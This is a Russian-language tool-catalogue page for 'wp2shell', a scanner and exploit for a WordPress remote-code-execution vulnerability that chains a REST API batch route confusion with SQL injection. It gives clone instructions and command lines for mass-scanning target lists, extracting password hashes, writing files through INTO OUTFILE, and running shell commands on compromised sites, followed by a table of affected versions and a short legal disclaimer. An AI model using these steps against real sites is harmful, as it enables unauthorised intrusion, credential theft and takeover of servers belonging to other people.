Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
wp2shell — wp2shell - WordPress CVE-2026-63030 Exploit & Scanner | Kitploit
Инструменты/GitHubGitHub/lutfifakee-project/wp2shell
Vulnerability ScannersExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHublutfifakee-project/wp2shell

wp2shell

wp2shell - WordPress CVE-2026-63030 Exploit & Scanner

Репозиторий
611 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🔍 wp2shell - Сканер уязвимостей и эксплойт WordPress CVE-2026-63030

⚡ Быстрый сканер уязвимостей и эксплойт в реальном времени для CVE-2026-63030 (wp2shell)


📌 Обзор

wp2shell — это комплексный набор инструментов для обнаружения и использования CVE-2026-63030, критической уязвимости в WordPress, позволяющей неаутентифицированным злоумышленникам выполнять удаленный код через путаницу маршрутов пакетных запросов REST API в сочетании с SQL-инъекцией.

🔍 Что такое CVE-2026-63030?

CVE-2026-63030 (wp2shell) — это критическая уязвимость, обнаруженная Adam Kues (Assetnote / Searchlight Cyber), затрагивающая ядро WordPress. Она объединяет две ошибки:

  1. GHSA-ff9f-jf42-662q - Путаница маршрутов пакетных запросов REST
  2. GHSA-fpp7-x2x2-2mjf - SQL-инъекция author__not_in

📊 Затронутые версии



📦 Клонирование и настройка

root@kitploit:~
# Clone repository
git clone https://github.com/Lutfifakee-Project/wp2shell.git
cd wp2shell

# No dependencies required - uses Python standard library only!
# Python 3.7+ required

🛠️ Включенные инструменты

1️⃣ wp2shell_scanner.py - Быстрый сканер

Многопоточный сканер реального времени для обнаружения уязвимостей в больших масштабах.

root@kitploit:~
# Basic scan
python wp2shell_scanner.py -f list.txt -o results.txt

# Skip SQLi test (faster)
python wp2shell_scanner.py -f list.txt -o results.txt --no-sqli-test

# JSON output
python wp2shell_scanner.py -f list.txt -j

2️⃣ wp2shell_intooutfile.py - Эксплойт INTO OUTFILE

Демонстрирует вариант RCE через INTO OUTFILE (требуется привилегия FILE в MySQL).

root@kitploit:~
# Single target
python3 wp2shell_intooutfile.py https://target.com

# Multiple targets
python3 wp2shell_intooutfile.py -f list.txt -t 10

3️⃣ wp2shell-exploit.py - Эксплойт в одном файле

Переносимая версия эксплойта в одном файле с полной функциональностью.

root@kitploit:~
# Check vulnerability
python wp2shell-exploit.py check https://target.com

# Read users (extract password hashes)
python wp2shell-exploit.py read https://target.com --preset users

# Read fingerprint
python wp2shell-exploit.py read https://target.com --preset fingerprint

# Execute command (after cracking hash)
python wp2shell-exploit.py shell https://target.com --user admin --password "cracked" --cmd "id"

⚠️ Правовое предупреждение

ВАЖНО: Этот инструмент предназначен только для образовательных и авторизованных тестовых целей.

  • Используйте только на системах, которыми вы владеете или на тестирование которых имеете явное письменное разрешение.
  • Несанкционированный доступ к компьютерным системам незаконен.
  • Разработчики не несут ответственности за неправомерное использование этого программного обеспечения.
  • Используйте ответственно и этично.
Скачать инструмент
Диапазон версийВоздействиеСтатус
6.9.0 - 6.9.4🔴 Удаленное выполнение кода (Критический)❌ Уязвим
7.0.0 - 7.0.1🔴 Удаленное выполнение кода (Критический)❌ Уязвим
6.8.0 - 6.8.5🟡 SQL-инъекция (Высокий)❌ Уязвим
6.9.5+ / 7.0.2+✅ Исправлено✅ Безопасно